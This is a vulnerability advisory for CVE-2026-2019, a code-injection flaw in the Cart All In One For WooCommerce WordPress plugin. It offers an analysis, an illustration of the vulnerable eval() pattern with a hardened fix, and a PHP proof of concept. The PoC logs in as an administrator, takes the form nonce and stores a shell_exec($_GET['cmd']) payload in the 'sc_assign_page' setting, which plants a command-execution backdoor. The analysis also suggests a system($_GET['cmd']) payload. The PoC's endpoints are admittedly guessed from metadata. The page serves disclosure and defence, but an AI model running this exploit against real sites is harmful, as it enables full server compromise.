Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-2019: Cart All In One For WooCommerce <= 1.1.21 – Authenticated (Administrator+) Code Injection via 'sc_assign_page' Setting (woo-cart-all-in-one)

CVE ID: CVE-2026-2019
Severity: High (CVSS 7.2)
CWE: CWE-74
Vulnerable Version: 1.1.21
Patched Version:
Disclosed: February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2019 (metadata-based):
This vulnerability is an authenticated code injection flaw in the Cart All In One For WooCommerce WordPress plugin. The ‘Assign page’ field, labeled ‘sc_assign_page’ internally, passes user-supplied data directly to the eval() function without proper sanitization. Attackers with administrator privileges can execute arbitrary PHP code on the server, leading to full server compromise.

Atomic Edge research identifies the root cause as CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component. The vulnerability description explicitly states the plugin passes the ‘Assign page’ field value directly to eval(). This indicates the plugin likely retrieves the ‘sc_assign_page’ parameter from a POST request, stores it in the database via update_option(), then later retrieves and executes it via eval() without validation. These conclusions are inferred from the CWE classification and vulnerability description, not confirmed via source code review.

Exploitation requires administrator-level access to WordPress. Attackers would navigate to the plugin’s settings page, typically found at /wp-admin/admin.php?page=woo-cart-all-in-one or a similar admin menu slug. They would submit a POST request containing the malicious PHP code in the ‘sc_assign_page’ parameter. A payload like `system($_GET['cmd']);` would allow subsequent command execution via HTTP parameters. The exact AJAX action or admin endpoint name is unspecified in metadata, but WordPress plugin patterns suggest it processes settings through admin_post or wp_ajax hooks.

Remediation requires replacing the eval() call with a safe alternative. The plugin should implement a strict allowlist of expected values for the ‘Assign page’ field, such as valid page IDs or slugs. If dynamic code execution is absolutely necessary, the plugin must implement a sandboxed environment with disabled dangerous functions. The patched version 1.1.22 likely removes the eval() usage entirely or adds input validation before execution.
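To make the inferred root cause and the recommended fix concrete, the following is an added illustration, not code from the plugin or from Atomic Edge. The option name 'sc_assign_page', the update_option()/eval() flow and the function names are assumptions drawn from the description above; the plugin's source was not reviewed.

```php
<?php
// Added illustration, not the plugin's code. The option name 'sc_assign_page'
// and the update_option() -> eval() flow are assumed from the advisory text.

// Inferred vulnerable pattern: the admin-supplied setting is stored verbatim
// and later executed, so any administrator input becomes server-side PHP.
function sc_save_assign_page_vulnerable() {
    update_option( 'sc_assign_page', wp_unslash( $_POST['sc_assign_page'] ?? '' ) );
}
function sc_render_assign_page_vulnerable() {
    eval( get_option( 'sc_assign_page', '' ) ); // CWE-74: untrusted data reaches eval()
}

// Hardened replacement: treat the setting as a page ID, verify the request
// came from the settings form, restrict it to an existing published page and
// resolve it to a URL at render time. No dynamic code execution remains.
function sc_save_assign_page_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'sc_save_assign_page' ); // nonce tied to this form

    $page_id = absint( $_POST['sc_assign_page'] ?? 0 );
    $page    = $page_id ? get_post( $page_id ) : null;

    // Allowlist: only an existing, published page may be assigned.
    if ( ! $page || 'page' !== $page->post_type || 'publish' !== $page->post_status ) {
        add_settings_error( 'sc_assign_page', 'invalid_page', 'Select a valid published page.' );
        return;
    }
    update_option( 'sc_assign_page', $page_id );
}
function sc_assign_page_url_hardened() {
    $page_id = absint( get_option( 'sc_assign_page', 0 ) );
    return $page_id ? get_permalink( $page_id ) : '';
}
```

Storing an integer ID rather than a string also makes an existing compromise easy to spot: any non-numeric value in the option row is a signal that the vulnerable version accepted code.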

Successful exploitation grants attackers arbitrary PHP code execution with web server privileges. This enables complete server control, including file system access, database manipulation, and remote shell establishment. Attackers can install persistent backdoors, steal sensitive data, or pivot to internal network systems. The CVSS 7.2 score reflects the high impact tempered by the administrator privilege requirement.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2019 - Cart All In One For WooCommerce <= 1.1.21 - Authenticated (Administrator+) Code Injection via 'sc_assign_page' Setting
/**
 * Proof of Concept for CVE-2026-2019
 * Assumptions based on metadata:
 * 1. Administrator credentials are required
 * 2. Plugin processes settings via admin POST endpoint
 * 3. Parameter name is 'sc_assign_page' based on description
 * 4. Settings page uses standard WordPress admin form submission
 */

$target_url = 'https://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Verify login by checking for admin dashboard
if (strpos($response, 'Dashboard') === false) {
    die('Authentication failed');
}

// Step 2: Locate plugin settings page
// Metadata doesn't specify exact settings page URL
// Common pattern: /wp-admin/admin.php?page=woo-cart-all-in-one
$settings_url = $target_url . '/wp-admin/admin.php?page=woo-cart-all-in-one';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$settings_page = curl_exec($ch);

// Step 3: Extract nonce from settings page
// WordPress admin forms include nonce for security
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $settings_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    // Alternative: try to find the form action
    preg_match('/action="([^"]+)"/', $settings_page, $action_matches);
    $form_action = $action_matches[1] ?? $settings_url;
}

// Step 4: Construct exploit payload
// PHP code that will be executed via eval(); the "$" is escaped so the literal
// text is sent rather than interpolated by this script
$php_payload = "echo 'Atomic Edge Test: ' . shell_exec(\$_GET['cmd']);";

// Step 5: Submit malicious settings
$exploit_data = array(
    'sc_assign_page' => $php_payload,
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $settings_url,
    'submit' => 'Save Changes'
);

$exploit_url = $form_action ?? $settings_url;
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$exploit_response = curl_exec($ch);

// Step 6: Trigger code execution
// The plugin likely executes the stored code on cart pages
// This step requires knowing where the eval() occurs
// Without code review, we cannot reliably trigger execution

echo "Payload submitted. Manual verification required:\n";
echo "1. Visit any cart page to trigger eval()\n";
echo "2. Append ?cmd=whoami to URL for command execution\n";

curl_close($ch);
?>
